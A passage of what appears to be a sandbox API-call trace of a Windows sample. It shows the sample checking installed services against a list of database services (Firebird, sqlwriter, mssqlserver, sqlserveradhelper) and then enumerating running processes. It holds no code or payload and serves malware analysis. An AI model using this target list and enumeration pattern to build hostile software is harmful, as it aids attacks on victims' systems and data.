(lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0189.004] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0189.004] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0189.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0189.004] lstrlenW (lpString="DusmSvc") returned 7 [0189.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0189.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0189.004] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0189.004] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0189.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0189.004] lstrlenW (lpString="EventLog") returned 8 [0189.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0189.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0189.004] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0189.004] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0189.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0189.004] lstrlenW (lpString="EventSystem") returned 11 [0189.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0189.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0189.004] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0189.004] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0189.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0189.005] lstrlenW (lpString="FontCache") returned 9 [0189.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0189.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0189.005] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0189.005] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0189.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0189.005] lstrlenW (lpString="gpsvc") returned 5 [0189.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0189.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0189.005] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0189.005] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0189.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0189.005] lstrlenW (lpString="iphlpsvc") returned 8 [0189.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0189.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0189.005] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0189.005] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0189.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0189.005] lstrlenW (lpString="KeyIso") returned 6 [0189.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0189.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0189.005] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0189.005] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0189.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0189.005] lstrlenW (lpString="LanmanServer") returned 12 [0189.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0189.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0189.005] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0189.005] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0189.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0189.005] lstrlenW (lpString="LanmanWorkstation") returned 17 [0189.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0189.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0189.006] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0189.006] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0189.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0189.006] lstrlenW (lpString="lfsvc") returned 5 [0189.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0189.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0189.006] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0189.006] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0189.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0189.006] lstrlenW (lpString="lmhosts") returned 7 [0189.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0189.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0189.006] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0189.006] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0189.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0189.006] lstrlenW (lpString="LSM") returned 3 [0189.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0189.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0189.006] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0189.006] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0189.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0189.006] lstrlenW (lpString="MpsSvc") returned 6 [0189.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0189.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0189.006] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0189.006] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0189.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0189.006] lstrlenW (lpString="NcbService") returned 10 [0189.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0189.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0189.006] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0189.006] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0189.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0189.007] lstrlenW (lpString="netprofm") returned 8 [0189.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0189.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0189.007] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0189.007] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0189.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0189.007] lstrlenW (lpString="NgcSvc") returned 6 [0189.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0189.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0189.007] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0189.007] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0189.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0189.007] lstrlenW (lpString="NlaSvc") returned 6 [0189.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0189.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0189.007] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0189.007] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0189.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0189.007] lstrlenW (lpString="nsi") returned 3 [0189.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0189.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0189.007] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0189.007] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0189.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0189.007] lstrlenW (lpString="PcaSvc") returned 6 [0189.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0189.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0189.007] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0189.007] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0189.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0189.007] lstrlenW (lpString="PlugPlay") returned 8 [0189.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0189.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0189.007] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0189.008] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0189.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0189.008] lstrlenW (lpString="Power") returned 5 [0189.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0189.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0189.008] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0189.008] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0189.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0189.008] lstrlenW (lpString="ProfSvc") returned 7 [0189.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0189.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0189.008] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0189.008] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0189.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0189.008] lstrlenW (lpString="RpcEptMapper") returned 12 [0189.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0189.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0189.008] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0189.008] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0189.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0189.008] lstrlenW (lpString="RpcSs") returned 5 [0189.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0189.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0189.008] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0189.008] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0189.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0189.008] lstrlenW (lpString="SamSs") returned 5 [0189.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0189.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0189.008] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0189.008] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0189.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0189.009] lstrlenW (lpString="Schedule") returned 8 [0189.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0189.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0189.009] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0189.009] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0189.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0189.009] lstrlenW (lpString="SecurityHealthService") returned 21 [0189.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0189.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0189.009] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0189.009] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0189.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0189.009] lstrlenW (lpString="SENS") returned 4 [0189.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0189.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0189.009] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0189.009] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0189.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0189.009] lstrlenW (lpString="ShellHWDetection") returned 16 [0189.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0189.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0189.009] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0189.009] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0189.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0189.009] lstrlenW (lpString="Spooler") returned 7 [0189.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0189.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0189.009] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0189.009] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0189.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0189.009] lstrlenW (lpString="StateRepository") returned 15 [0189.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0189.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0189.010] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0189.010] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0189.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0189.010] lstrlenW (lpString="SysMain") returned 7 [0189.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0189.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0189.010] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0189.010] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0189.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0189.010] lstrlenW (lpString="SystemEventsBroker") returned 18 [0189.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0189.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0189.010] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0189.010] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0189.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0189.010] lstrlenW (lpString="Themes") returned 6 [0189.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0189.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0189.010] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0189.010] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0189.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0189.010] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0189.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0189.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0189.010] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0189.010] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0189.010] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x394 [0189.013] Process32FirstW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.014] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0189.014] lstrlenW (lpString="System") returned 6 [0189.014] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0189.015] lstrlenW (lpString="smss.exe") returned 8 [0189.015] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.016] lstrlenW (lpString="csrss.exe") returned 9 [0189.016] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0189.018] lstrlenW (lpString="wininit.exe") returned 11 [0189.018] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.019] lstrlenW (lpString="csrss.exe") returned 9 [0189.019] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0189.020] lstrlenW (lpString="winlogon.exe") returned 12 [0189.020] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0189.021] lstrlenW (lpString="services.exe") returned 12 [0189.021] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0189.022] lstrlenW (lpString="lsass.exe") returned 9 [0189.022] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0189.023] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0189.023] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0189.023] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0189.023] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.024] lstrlenW (lpString="svchost.exe") returned 11 [0189.024] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.025] lstrlenW (lpString="svchost.exe") returned 11 [0189.025] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0189.026] lstrlenW (lpString="dwm.exe") returned 7 [0189.026] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.026] lstrlenW (lpString="svchost.exe") returned 11 [0189.026] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.027] lstrlenW (lpString="svchost.exe") returned 11 [0189.027] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.028] lstrlenW (lpString="svchost.exe") returned 11 [0189.028] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.028] lstrlenW (lpString="svchost.exe") returned 11 [0189.028] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.029] lstrlenW (lpString="svchost.exe") returned 11 [0189.029] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.030] lstrlenW (lpString="svchost.exe") returned 11 [0189.030] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.030] lstrlenW (lpString="svchost.exe") returned 11 [0189.030] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.031] lstrlenW (lpString="svchost.exe") returned 11 [0189.031] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.032] lstrlenW (lpString="svchost.exe") returned 11 [0189.032] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.032] lstrlenW (lpString="svchost.exe") returned 11 [0189.032] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0189.033] lstrlenW (lpString="spoolsv.exe") returned 11 [0189.033] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.034] lstrlenW (lpString="svchost.exe") returned 11 [0189.034] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, 